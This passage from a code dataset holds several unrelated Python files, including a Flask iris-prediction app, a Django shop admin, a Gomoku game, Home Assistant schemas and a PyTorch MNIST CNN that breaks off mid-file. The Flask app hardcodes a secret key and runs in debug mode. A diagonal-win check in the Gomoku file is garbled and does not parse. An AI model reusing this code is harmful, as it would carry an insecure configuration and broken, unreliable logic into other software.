print(\"Done!\")\n\n\nif __name__ == \"__main__\":\n for i in range(3):\n repeatedTest(i, 5000, 10)\n","sub_path":"project/demoHasCycleDFS.py","file_name":"demoHasCycleDFS.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"127421565","text":"#!/usr/bin/env python3\nimport cv2\nimport math\nimport numpy as np\nfrom keras import backend as k\nfrom keras.models import model_from_json\n\n# init variables\njson_model_path = \"./model/model_struct.json\"\nweights_path = \"./model/model_weights.h5\"\ntarget_size = (200, 200)\nalpha = 0.7\nbeta = 0.5\nv_max = 10\nv_old = 0\nsa_old = 0\n\ncap = cv2.VideoCapture(0)\n\n# Set keras to test phase\nk.set_learning_phase(0)\n\n# Load json and weights, then compile model\nwith open(json_model_path, 'r') as json_file:\n loaded_model_json = json_file.read()\nmodel = model_from_json(loaded_model_json)\nmodel.load_weights(weights_path)\nmodel.compile(loss='mse', optimizer='sgd')\n\nwhile True:\n ret, frame = cap.read()\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n img = cv2.resize(img, target_size)\n img = np.asarray(img, dtype=np.float32) * np.float32(1.0/255.0)\n\n carry = np.array(img)[np.newaxis, :, :, np.newaxis]\n\n outs = model.predict(carry, batch_size=None, verbose=0, steps=None)\n theta, p_t = outs[0][0], outs[1][0]\n\n velocity = (1 - alpha) * v_old + alpha * (1 - p_t) * v_max\n steering_angle = (1 - beta) * sa_old + beta * math.pi / 2 * theta\n sa_deg = steering_angle / math.pi * 180\n\n v_old = velocity\n sa_old = steering_angle\n\n out = {'Velocity\\t ==> \\t': velocity, 'Steering Angle\\t ==> \\t': sa_deg}\n for name, val in out.items():\n # prnt = \"{0} ==> {1:3.4f}\"\n # print(print.format(name, float(val)))\n print(name + \"%3.4f\" % float(val))\n\n cv2.imshow('frame', img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"misc/test_dronet_with_webcam.py","file_name":"test_dronet_with_webcam.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"331543458","text":"from flask import Flask, render_template, flash, url_for, redirect\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom forms import PredictionForm\r\nimport pickle\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = '19416c21be3d611b5d01b37409a55fe9'\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///prediction.db'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\nclass Flower(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n sl = db.Column(db.Float())\r\n sw = db.Column(db.Float())\r\n pl = db.Column(db.Float())\r\n pw = db.Column(db.Float())\r\n\r\n def __repr__(self):\r\n return f\"Flower('{self.sl}','{self.sw}','{self.pl}','{self.pw}')\"\r\n # return f\"User('{self.username}', '{self.email}', '{self.image_file}')\"\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route('/data', methods=['GET', 'POST'])\r\ndef data():\r\n form = PredictionForm()\r\n if form.validate_on_submit():\r\n flower = Flower(sl=form.sl.data, sw=form.sw.data, pl=form.pl.data, pw=form.pw.data)\r\n db.session.add(flower)\r\n db.session.commit()\r\n return redirect(url_for('predict'))\r\n return render_template('data.html', form=form)\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n # flower = Flower.query.all()[-1]\r\n # return render_template('predict.html')\r\n flower = Flower.query.all()[-1]\r\n test_data = [[flower.sl, flower.sw, flower.pl, flower.pw]]\r\n model = pickle.load(open('model.pkl', 'rb'))\r\n prediction = model.predict(test_data)\r\n output = prediction[0]\r\n return render_template('predict.html', value=output)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(port = 5001, debug=True)\r\n","sub_path":"ML_Projects/flask/Iris/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"260515891","text":"from click.testing import CliRunner\nfrom evernote_to_sqlite.cli import cli\nimport sqlite_utils\nimport pathlib\n\nexample_enex = pathlib.Path(__file__).parent / \"example-note.enex\"\n\n\ndef test_version():\n runner = CliRunner()\n with runner.isolated_filesystem():\n result = runner.invoke(cli, [\"--version\"])\n assert 0 == result.exit_code\n assert result.output.startswith(\"cli, version \")\n\n\ndef test_enex(tmpdir):\n output = str(tmpdir / \"output.db\")\n result = CliRunner().invoke(\n cli, [\"enex\", output, str(example_enex)], catch_exceptions=False\n )\n assert 0 == result.exit_code\n db = sqlite_utils.Database(output)\n assert set(db.table_names()) == {\n \"notes\",\n \"resources\",\n \"resources_data\",\n \"note_resources\",\n \"notes_fts_idx\",\n \"notes_fts\",\n \"notes_fts_config\",\n \"notes_fts_docsize\",\n \"notes_fts_data\",\n \"resources_fts_config\",\n \"resources_fts\",\n \"resources_fts_idx\",\n \"resources_fts_data\",\n \"resources_fts_docsize\",\n }\n assert list(db[\"notes\"].rows) == [\n {\n \"id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"title\": \"Example note with images\",\n \"content\": 'This note includes two images.
The Python logo
The Evernote logo
This image contains text:
',\n \"created\": \"2020-10-11T21:28:22\",\n \"updated\": \"2020-10-11T23:30:38\",\n \"latitude\": \"37.77742571705006\",\n \"longitude\": \"-122.4256495114116\",\n \"altitude\": \"23.16121864318848\",\n \"author\": \"Simon Willison\",\n \"source\": \"desktop.mac\",\n \"reminder-order\": \"0\",\n }\n ]\n\n assert list(db[\"resources\"].rows) == [\n {\n \"md5\": \"61098c2c541de7f0a907c301dd6542da\",\n \"mime\": \"image/svg+xml\",\n \"width\": \"0\",\n \"height\": \"0\",\n \"duration\": \"0\",\n \"timestamp\": \"19700101T000000Z\",\n \"ocr\": None,\n \"reco-type\": None,\n \"file-name\": None,\n },\n {\n \"md5\": \"91bd26175acac0b2ffdb6efac199f8ca\",\n \"mime\": \"image/svg+xml\",\n \"width\": \"0\",\n \"height\": \"0\",\n \"duration\": \"0\",\n \"timestamp\": \"19700101T000000Z\",\n \"ocr\": None,\n \"reco-type\": None,\n \"file-name\": None,\n },\n {\n \"md5\": \"76dd28b07797cc9f3f129c4871c5293c\",\n \"mime\": \"image/png\",\n \"width\": \"670\",\n \"height\": \"128\",\n \"duration\": \"0\",\n \"timestamp\": \"19700101T000000Z\",\n \"ocr\": \"This is so can test the OCR\",\n \"reco-type\": \"unknown\",\n \"file-name\": \"Untitled-1.png\",\n },\n ]\n resource_md5s = [rd[\"md5\"] for rd in db[\"resources_data\"].rows]\n assert resource_md5s == [\n \"61098c2c541de7f0a907c301dd6542da\",\n \"91bd26175acac0b2ffdb6efac199f8ca\",\n \"76dd28b07797cc9f3f129c4871c5293c\",\n ]\n assert list(db[\"note_resources\"].rows) == [\n {\n \"note_id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"resource_id\": \"61098c2c541de7f0a907c301dd6542da\",\n },\n {\n \"note_id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"resource_id\": \"91bd26175acac0b2ffdb6efac199f8ca\",\n },\n {\n \"note_id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"resource_id\": \"76dd28b07797cc9f3f129c4871c5293c\",\n },\n ]\n # Check we enabled Porter stemming\n assert \"tokenize='porter'\" in db[\"notes_fts\"].schema\n","sub_path":"tests/test_evernote_to_sqlite.py","file_name":"test_evernote_to_sqlite.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"567436666","text":"from django.contrib import admin\n\nfrom import_export.admin import ImportExportModelAdmin\n\nfrom .models import (Producer,\n ProductGroup,\n Attribute,\n Article,\n ArticleImage,\n PaymentItem,\n PaymentOrder,\n PaymentOrderCommentHistory,\n ArticleGroup)\n\nfrom .forms import (ProducerForm,\n ProductGroupForm,\n AttributeForm,\n ArticleForm,\n ArticleImageForm,\n PaymentItemForm,\n PaymentOrderForm,\n PaymentOrderCommentHistoryForm,\n ArticleGroupForm)\n\n\nclass ProducerAdmin(ImportExportModelAdmin):\n form = ProducerForm\n list_display = ('id', 'producer_name', 'link',\n 'profile_image', 'description')\n fieldsets = (\n (\"General info\", {'fields': ('producer_name',\n 'link', 'profile_image', 'description')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('producer_name', 'link', 'profile_image', 'description'),\n }),\n )\n search_fields = ('id', 'producer_name', 'link',\n 'profile_image', 'description',)\n ordering = ('id', 'producer_name', 'link', 'profile_image', 'description',)\n\n\nclass AttributeAdmin(ImportExportModelAdmin):\n form = AttributeForm\n list_display = ('id', 'article_id', 'feature_id', 'value')\n fieldsets = (\n (\"General info\", {'fields': ('article_id', 'feature_id', 'value',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_id', 'feature_id', 'value',),\n }),\n )\n search_fields = ('id', 'article_id__article_name',\n 'feature_id__feature_name',)\n ordering = ('id', 'article_id__article_name',\n 'feature_id__feature_name', 'value',)\n\n\nclass ArticleAdmin(ImportExportModelAdmin):\n form = ArticleForm\n list_display = ('id', 'article_code', 'article_name', 'sub_category_id', 'producer_id',\n 'product_group_id', 'description', 'price', 'unit_of_measure', 'currency', 'is_available')\n list_filter = ('is_available',)\n fieldsets = (\n (\"General info\", {'fields': ('article_code', 'article_name', 'sub_category_id', 'producer_id',\n 'product_group_id', 'description', 'price', 'unit_of_measure', 'currency', 'is_available')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_code', 'article_name', 'sub_category_id', 'producer_id', 'product_group_id', 'description', 'price', 'unit_of_measure', 'currency', 'is_available'),\n }),\n )\n search_fields = ('id', 'article_code', 'article_name', 'sub_category_id__sub_category_name',\n 'producer_id__producer_name', 'product_group_id__group_name', 'description', 'unit_of_measure',)\n ordering = ('id', 'article_code', 'article_name', 'sub_category_id__sub_category_name', 'producer_id__producer_name',\n 'product_group_id__group_name', 'description', 'price', 'unit_of_measure', 'currency', 'is_available',)\n\n\nclass ArticleImageAdmin(admin.ModelAdmin):\n form = ArticleImageForm\n list_display = ('id', 'article_id', 'image', 'image_name',\n 'purpose', 'content_type', 'size', 'height', 'width')\n fieldsets = (\n (\"General info\", {'fields': ('article_id',\n 'image', 'image_name', 'purpose',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_id', 'image', 'image_name', 'purpose',),\n }),\n )\n search_fields = ('id', 'article_id__article_name', 'image',\n 'image_name', 'purpose', 'content_type',)\n ordering = ('id', 'article_id__article_name', 'image', 'image_name',\n 'purpose', 'content_type', 'size', 'height', 'width',)\n\n\nclass ProductGroupFormAdmin(ImportExportModelAdmin):\n form = ProductGroupForm\n list_display = ('id', 'group_name')\n fieldsets = (\n (\"General info\", {'fields': ('group_name',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('group_name',),\n }),\n )\n search_fields = ('id', 'group_name',)\n ordering = ('id', 'group_name',)\n\n\nclass PaymentItemAdmin(admin.ModelAdmin):\n form = PaymentItemForm\n readonly_fields = ('user_discount', 'article_price')\n list_display = ('id', 'article_id', 'payment_order_id',\n 'amount', 'user_discount', 'article_price', 'article_attributes',)\n fieldsets = (\n (\"General info\", {'fields': ('article_id', 'payment_order_id',\n 'number_of_pieces', 'user_discount', 'article_price', 'article_attributes',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_id', 'payment_order_id', 'number_of_pieces', 'user_discount', 'article_price', 'article_attributes',),\n }),\n )\n search_fields = ('id', 'article_id__article_name',\n 'payment_order_id__email__email',)\n ordering = ('id', 'article_id__article_name',\n 'payment_order_id__email', 'user_discount', 'article_price',)\n\n\nclass PaymentOrderAdmin(admin.ModelAdmin):\n form = PaymentOrderForm\n readonly_fields = ('time_created','time_modified', 'total_cost')\n list_display = ('id', 'full_name', 'address', 'zip_code', 'city', 'phone',\n 'method_of_payment', 'total_cost', 'status', 'time_created')\n list_filter = ('status',)\n fieldsets = (\n (\"General info\", {'fields': ('email', 'address', 'zip_code',\n 'city', 'phone', 'method_of_payment', 'status', 'total_cost','time_created','time_modified',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'address', 'zip_code', 'city', 'phone', 'method_of_payment', 'status',),\n }),\n )\n search_fields = ('id', 'email__email', 'address', 'zip_code',\n 'city', 'method_of_payment', 'status',)\n ordering = ('id', 'email__email', 'address', 'zip_code', 'city', 'method_of_payment', 'status', 'total_cost', 'time_created',)\n\nclass PaymentOrderCommentHistoryAdmin(admin.ModelAdmin):\n form = PaymentOrderCommentHistoryForm\n readonly_fields = ('time_created', 'status',)\n \n list_display = ('payment_order_id', 'created_by', 'comment', 'status', 'time_created',)\n list_filter = ('status',)\n\n fieldsets = (\n (\"General info\", {\n 'fields': (\n 'payment_order_id', 'comment', 'status', 'time_created',\n )\n }),\n )\n \n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': (\n 'payment_order_id', 'comment',\n ),\n }),\n )\n search_fields = ('payment_order_id', 'status', 'created_by',)\n ordering = ('payment_order_id', 'comment', 'status', 'time_created', 'created_by',)\n\n def get_form(self, request, *args, **kwargs):\n form = super(PaymentOrderCommentHistoryAdmin, self).get_form(request, *args, **kwargs)\n form.current_user = request.user\n return form\n\n\nclass ArticleGroupAdmin(admin.ModelAdmin):\n form = ArticleGroupForm\n list_display = ('id', 'group_name','show_articles', 'description', 'link')\n fieldsets = (\n (\"General info\", {\n 'fields': ('group_name', 'article_ids', 'description', 'link',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('group_name', 'article_ids', 'description', 'link',),\n }),\n )\n search_fields = ('id', 'group_name', 'article_ids', 'description','link',)\n ordering = ('id', 'group_name', 'article_ids', 'description', 'link',)\n\n def show_articles(self, obj):\n return \" / \".join([a.article_name for a in obj.article_ids.all()])\n\n\nadmin.site.register(Producer, ProducerAdmin)\nadmin.site.register(ProductGroup, ProductGroupFormAdmin)\nadmin.site.register(Attribute, AttributeAdmin)\nadmin.site.register(Article, ArticleAdmin)\nadmin.site.register(ArticleImage, ArticleImageAdmin)\nadmin.site.register(PaymentItem, PaymentItemAdmin)\nadmin.site.register(PaymentOrder, PaymentOrderAdmin)\nadmin.site.register(ArticleGroup, ArticleGroupAdmin)\nadmin.site.register(PaymentOrderCommentHistory, PaymentOrderCommentHistoryAdmin)\n","sub_path":"product/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"331608213","text":"N, M = 9,9\na_row = 5\nn_players = 2\nmarks = ['B', 'W']\ngrid = [['.' for x in range(N)] for y in range(M)]\n\n# This function prints the grid of Gomoku as the game progresses\ndef print_grid():\n for i in range(n_players):\n print('Player %d: %c ' % (i + 1, marks[i]), end='')\n if i < n_players - 1:\n print('vs ', end='')\n print()\n print('--' + '---' * M + '--')\n for i in range(N):\n print(end='| ')\n for j in range(M):\n print(grid[i][j], end=' ')\n print(end='|')\n print()\n print('--' + '---' * M + '--')\n\n\n# This function checks if the game has a win state or not\ndef check_win(i,j,mark):\n for i in range(N):\n count1 = count2 = count3 = 0\n for j in range(N):\n if grid[i][j] == mark:\n count1 += 1\n if count1 == 5:\n return True\n\n if grid[j][i] == mark:\n count3 += 1\n if count3 == 5:\n return True\n\n\n co1 = 0\n v = j ; k = i # dig right\n\n while j <= v = 5:\n return True\n\n\n co2 = 0 # dig left\n a = j ; y = i\n\n\n while a < N and -1 < y :\n if grid[y][a] == mark:\n co2 += 1\n else:\n break\n a += 1\n y -= 1\n vc = j - 1\n vb = i + 1\n while -1 < vc and vb < M:\n if grid[vb][vc] == mark:\n co2 += 1\n else :\n break\n vc -= 1\n vb += 1\n if co2 >= 5:\n return True\n\n return False\n\n# This function checks if the game has a tie state or not for the given mark\ndef check_tie_player(mark):\n for i in range(N):\n count1 = 0\n for j in range(M):\n if grid[i][j] == mark or grid[i][j] == '.': # row\n count1 += 1\n if count1 == 5:\n return False\n else:\n break\n\n for j in range(M):\n count2 = 0\n for i in range(N):\n if grid[i][j] == mark or grid[i][j] == '.': # column\n count2 += 1\n if count2 == 5:\n return False\n else:\n break\n\n for i in range(N // 2):\n for j in range(M):\n i += 1\n count3 = 0\n if grid[i][j] == mark or grid[i][j] == '.': # d right\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n\n for j in range(M//2+1):\n for i in range(N):\n j+=1\n count3=0\n if grid[i][j] == mark or grid[i][j] == '.' :\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n\n for j in range(M // 2, M):\n for i in range(N):\n j -= 1\n count3 = 0\n if grid[i][j] == mark or grid[i][j] == '.': # d left\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n\n for i in range(N // 2):\n for j in range(M-1,0,-1):\n i+=1\n count3 = 0\n if grid[i][j] == mark or grid[i][j] == '.': # d right\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n return True\n\n# This function checks if the game has a tie state or not\ndef check_tie():\n n_players=2\n all_tie = True\n for i in range(n_players):\n if not check_tie_player(marks[i]):\n all_tie = False\n return all_tie\n \"\"\"for i in range(N):\n for j in range(M):\n if grid[i][j] == '.':\n return False\n return True\"\"\"\n\n\n# This function checks if given cell is empty or not\ndef check_empty(i, j):\n empty = grid[i][j] == '.'\n return empty\n\n\n# This function checks if given position is valid or not\ndef check_valid_position(i, j):\n valid = (0<=i < N and 0<=j < M)\n return valid\n\n\n# This function sets the given mark to the given cell\ndef set_cell(i, j, mark):\n grid[i][j] = mark\n\n\n# This function clears the game structures\ndef grid_clear():\n global grid\n grid = [['.' for x in range(N)] for y in range(M)]\n\n\n# This function reads a valid position input\ndef read_input():\n i, j = map(int, input('Enter the row index and column index: ').split())\n while not check_valid_position(i, j) or not check_empty(i, j):\n i, j = map(int, input('Enter a valid row index and a valid column index: ').split())\n return i, j\n\n\n# MAIN FUNCTION\ndef play_game():\n print(\"Gomoku Game!\")\n print(\"Welcome...\")\n print(\"============================\")\n player = 0\n while True:\n # Prints the grid\n print_grid()\n # Read an input position from the player\n print('Player %s is playing now' % marks[player])\n i, j = read_input()\n # Set the player mark in the input position\n set_cell(i, j, marks[player])\n # Check if the grid has a win state\n if check_win(i,j,marks[player]):\n # Prints the grid\n print_grid()\n # Announcement of the final statement\n print('Congrats, Player %s is won!' % marks[player])\n break\n # Check if the grid has a tie state\n if check_tie():\n # Prints the grid\n print_grid()\n # Announcement of the final statement\n print(\"Woah! That's a tie!\")\n break\n # Player number changes after each turn\n player = (player + 1) % n_players\n\n\nwhile True:\n grid_clear()\n play_game()\n c = input('Play Again [Y/N] ')\n if c not in 'yY':\n break\n","sub_path":"gomoko.py","file_name":"gomoko.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"21081326","text":"\"\"\" predict_args.py\nPart 2 of Udacity AIPND final project submission for Marco Besier.\npredict_args.py contains the command line argument definitions for predict.py\n\"\"\"\n\nimport argparse\n\ndef get_args():\n \"\"\"\n Get argument parser for predict command line.\n \n Command line argument examples:\n - Print top K classes along with associated probabilities: python predict.py path_to_image --top_k 5\n - Load a JSON file that maps the class values to other category names: python predict.py path_to_image --category_names cat_to_name.json\n - Use GPU to calculate predictions: python predict.py path_to_image --gpu\n \n For argparse examples see https://pymotw.com/3/argparse\n Returns an argparse parser.\n \"\"\"\n \n parser = argparse.ArgumentParser(\n description=\"Image prediction.\",\n usage=\"python ./predict.py /path/to/image.jpg checkpoint.pth\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n \n parser.add_argument(\"path_to_image\",\n help=\"Path to image file.\",\n action=\"store\"\n ) \n \n parser.add_argument(\"checkpoint_file\",\n help=\"Path to checkpoint file.\",\n action=\"store\"\n )\n \n parser.add_argument(\"--save_dir\",\n action=\"store\",\n default=\".\",\n dest=\"save_dir\",\n type=str,\n help=\"Directory to save training checkpoint file.\"\n )\n \n parser.add_argument(\"--top_k\",\n action=\"store\",\n default=5,\n dest=\"top_k\",\n type=int,\n help=\"Return top K most likely classes.\"\n )\n \n parser.add_argument(\"--category_names\",\n action=\"store\",\n default=\"cat_to_name.json\",\n dest=\"categories_json\",\n type=str,\n help=\"Path to file containing the categories.\"\n )\n \n parser.add_argument(\"--gpu\",\n action=\"store_true\",\n dest=\"use_gpu\",\n default=False,\n help=\"Use GPU.\"\n )\n \n parser.parse_args()\n return parser\n\n\ndef main():\n \"\"\"\n Main Function\n \"\"\"\n print(f'Command line argument utility for predict.py\\nTry \"python predict.py -h\".')\n \nif __name__ == \"__main__\":\n main()\n\"\"\"\nmain() is called if script is executed on it's own.\n\"\"\"","sub_path":"predict_args.py","file_name":"predict_args.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"115900546","text":"\"\"\"Dedicate schema generation.\"\"\"\n\n__all__ = [\n 'BASE_DEVICE_SCHEMA',\n 'BASE_PLATFORM_SCHEMA',\n 'BASE_VALIDATOR_DOMAINS',\n 'USER_INPUT_DEVICE',\n 'USER_INPUT_DEVICE_SCHEMA',\n 'USER_INPUT_ADDITIONAL',\n 'USER_INPUT_ADDITIONAL_SCHEMA',\n 'CONFIG_SCHEMA',\n 'exclusive_auth_methods',\n 'test_for_list_correspondence',\n]\n\nfrom collections import OrderedDict\n\nimport homeassistant.helpers.config_validation as cv\nimport voluptuous as vol\nfrom homeassistant.const import CONF_NAME, CONF_SWITCHES, CONF_SCAN_INTERVAL, CONF_DEVICE_ID, CONF_PROTOCOL, \\\n CONF_HOST, CONF_PORT, CONF_TOKEN, CONF_SENSORS\n\nfrom .const import CONF_CONTROL_KEY, CONF_APPLICATION_ID, DEFAULT_APPLICATION_ID, CONF_CLOUD_HOST, DEFAULT_CLOUD_HOST, \\\n CONF_CLOUD_PORT, DEFAULT_CLOUD_PORT, DEFAULT_SCAN_INTERVAL, DOMAIN, CONF_DEVICES, CONF_USE_MODEL_FROM_PROTOCOL, \\\n DEFAULT_USE_MODEL_FROM_PROTOCOL, CONF_DOMAINS, PROTOCOL_DEFAULT, PROTOCOL_NAME\nfrom .supported_protocols import SUPPORTED_PROTOCOLS\n\n\ndef exclusive_auth_methods(schema: dict):\n host = schema.get(CONF_HOST)\n token = schema.get(CONF_TOKEN)\n if host is None:\n if token is None:\n raise vol.Invalid('Neither method of authentication (local nor cloud) is provided.')\n return schema\n elif token is not None:\n raise vol.Invalid('Both methods of authentication are provided, while only one at once is supported (for now).')\n return schema\n\n\ndef test_for_list_correspondence(config_key: str, protocol_key: str):\n def validator(values):\n param_val = values.get(config_key)\n if param_val is None or isinstance(param_val, bool):\n return values\n avail_val = set(SUPPORTED_PROTOCOLS[values.get(CONF_PROTOCOL)][protocol_key].keys())\n invalid_val = set(param_val) - avail_val\n if invalid_val:\n return vol.Invalid(\n message=config_key.capitalize() + ' types (%s) are invalid',\n path=[config_key]\n )\n return values\n\n return validator\n\nBASE_DEVICE_SCHEMA = {\n vol.Optional(CONF_NAME): cv.string,\n vol.Optional(CONF_SENSORS): vol.Any(bool, vol.All(cv.ensure_list, [cv.string])),\n vol.Optional(CONF_SWITCHES): vol.Any(bool, vol.All(cv.ensure_list, [cv.string])),\n vol.Optional(CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL): cv.time_period,\n}\n\nBASE_VALIDATOR_DOMAINS = [\n test_for_list_correspondence(config_key, protocol_key)\n for config_key, (entity_domain, protocol_key) in CONF_DOMAINS.items()\n]\n\nBASE_PLATFORM_SCHEMA = {\n **BASE_DEVICE_SCHEMA,\n\n # Required keys on direct control\n vol.Required(CONF_DEVICE_ID): cv.string,\n vol.Optional(CONF_CONTROL_KEY): cv.string,\n vol.Required(CONF_PROTOCOL): vol.In(SUPPORTED_PROTOCOLS.keys()),\n\n # Optional attributes\n vol.Optional(CONF_APPLICATION_ID, default=DEFAULT_APPLICATION_ID): cv.string,\n\n # Local authentication\n vol.Optional(CONF_HOST): cv.string,\n vol.Optional(CONF_PORT): cv.positive_int,\n\n # Cloud authentication\n vol.Optional(CONF_TOKEN): cv.string,\n vol.Optional(CONF_CLOUD_HOST, default=DEFAULT_CLOUD_HOST): cv.string,\n vol.Optional(CONF_CLOUD_PORT, default=DEFAULT_CLOUD_PORT): cv.positive_int,\n}\n\nDEVICE_SCHEMA = vol.All(BASE_PLATFORM_SCHEMA, exclusive_auth_methods, *BASE_VALIDATOR_DOMAINS)\n\nUSER_INPUT_DEVICE = OrderedDict()\nUSER_INPUT_DEVICE[vol.Required(CONF_NAME)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_DEVICE_ID)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_CONTROL_KEY)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_HOST)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_PROTOCOL)] = vol.In({\n p_id: p_def.get(PROTOCOL_NAME, p_id)\n for p_id, p_def in SUPPORTED_PROTOCOLS.items()\n})\nUSER_INPUT_DEVICE[vol.Optional(CONF_PORT)] = str\nUSER_INPUT_DEVICE[vol.Optional(CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL.seconds)] = int\n\nUSER_INPUT_DEVICE_SCHEMA = vol.Schema(USER_INPUT_DEVICE)\n\nUSER_INPUT_ADDITIONAL = lambda protocol_id, protocol_key: {\n vol.Optional(protocol_id + '_' + ent_type, default=ent_config.get(PROTOCOL_DEFAULT)): bool\n for ent_type, ent_config in SUPPORTED_PROTOCOLS[protocol_id][protocol_key].items()\n}\nUSER_INPUT_ADDITIONAL_SCHEMA = lambda *args, **kwargs: vol.Schema(USER_INPUT_ADDITIONAL(*args, **kwargs))\n\n# ACCOUNT_SCHEMA = {\n# vol.Optional(CONF_NAME, default=DEFAULT_NAME_ACCOUNT): cv.string,\n# vol.Required(CONF_TOKEN): cv.string,\n# vol.Optional(CONF_APPLICATION_ID, default=DEFAULT_APPLICATION_ID): cv.string,\n# vol.Optional(CONF_CUSTOMIZE): vol.Any(False, {cv.string: BASE_DEVICE_SCHEMA})\n# }\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: {\n vol.Optional(CONF_USE_MODEL_FROM_PROTOCOL, default=DEFAULT_USE_MODEL_FROM_PROTOCOL): cv.boolean,\n vol.Optional(CONF_DEVICES): vol.All(cv.ensure_list, [DEVICE_SCHEMA]),\n # vol.Optional(CONF_ACCOUNTS): vol.All(cv.ensure_list, [ACCOUNT_SCHEMA])\n }\n}, extra=vol.ALLOW_EXTRA)\n","sub_path":"custom_components/hekr/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"607525586","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.utils.data as Data\nimport torchvision\nimport matplotlib.pyplot as plt\n\nEPOCH = 1 #数据集训练几遍\nBATCH_SIZE = 50 #一批数据的个数\nLR = 0.001\nDOWNLOAD_MNIST = False\n\n#加载数据集\ntrain_data = torchvision.datasets.MNIST(\n root='./mnist',\n train=True,\n transform=torchvision.transforms.ToTensor(), #(0,1)\n download=DOWNLOAD_MNIST\n)\n\n#生成训练器\ntrain_loader = Data.DataLoader(dataset=train_data,batch_size=BATCH_SIZE,shuffle=True,num_workers=2)\n#加载测试集\ntest_data = torchvision.datasets.MNIST(root='./mnist/',train=False)\n\n#!!!cuda change here!!!\ntest_x=Variable(torch.unsqueeze(test_data.test_data,dim=1),volatile=True).type(torch.FloatTensor)[:2000].cuda()/255 #每个像素点的原值是0-255之间\ntest_y=test_data.test_labels[:2000].cuda()\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN,self).__init__()\n #一般来说一个大卷积层包括卷积层,激活函数和池化层\n self.conv1=nn.Sequential(\n nn.Conv2d(\n in_channels=1, #表示原始图片有多少层,也就是有多少不同种类的特征值,如RGB图片,有红,绿,蓝三个值\n out_channels=16,#表示输出多少个不同种类的特征值;也就是对同一个图片块,有16个过滤器同时工作\n kernel_size=5, #一个过滤器的长和宽都是五个像素点\n stride=1, #相邻两次扫描的图片块之间相隔几个像素点\n padding=2, #在图片周围多出2圈0值,防止过滤器的某一边超过图片边界,如何计算:if stride=1,padding=(kernel_size-1)/2,���证提取出的新图片长宽和原图一样\n ),\n nn.ReLU(),\n #池化层向下筛选需要的部分\n nn.MaxPool2d(\n kernel_size=2, #使用一个长宽为2的池化过滤器\n ),\n )\n self.conv2=nn.Sequential(\n nn.Conv2d(16,32,5,1,2), #输入的图片有16层,输出图片有32层\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.out=nn.Linear(32*7*7,10) #输入的高度是32,长宽为7,因为经过两次池化;输出为10个不同的值,即0-9\n\n def forward(self, x):\n x=self.conv1(x)\n x=self.conv2(x) #x中的数据有四个维度:(batch,32,7,7)\n x=x.view(x.size(0),-1) #保留batch,数据变为二维:(batch,32*7*7);因为输出层只接受一维数据作为输入\n output=self.out(x)\n return output\n\ncnn = CNN()\n\n#!!!cuda change 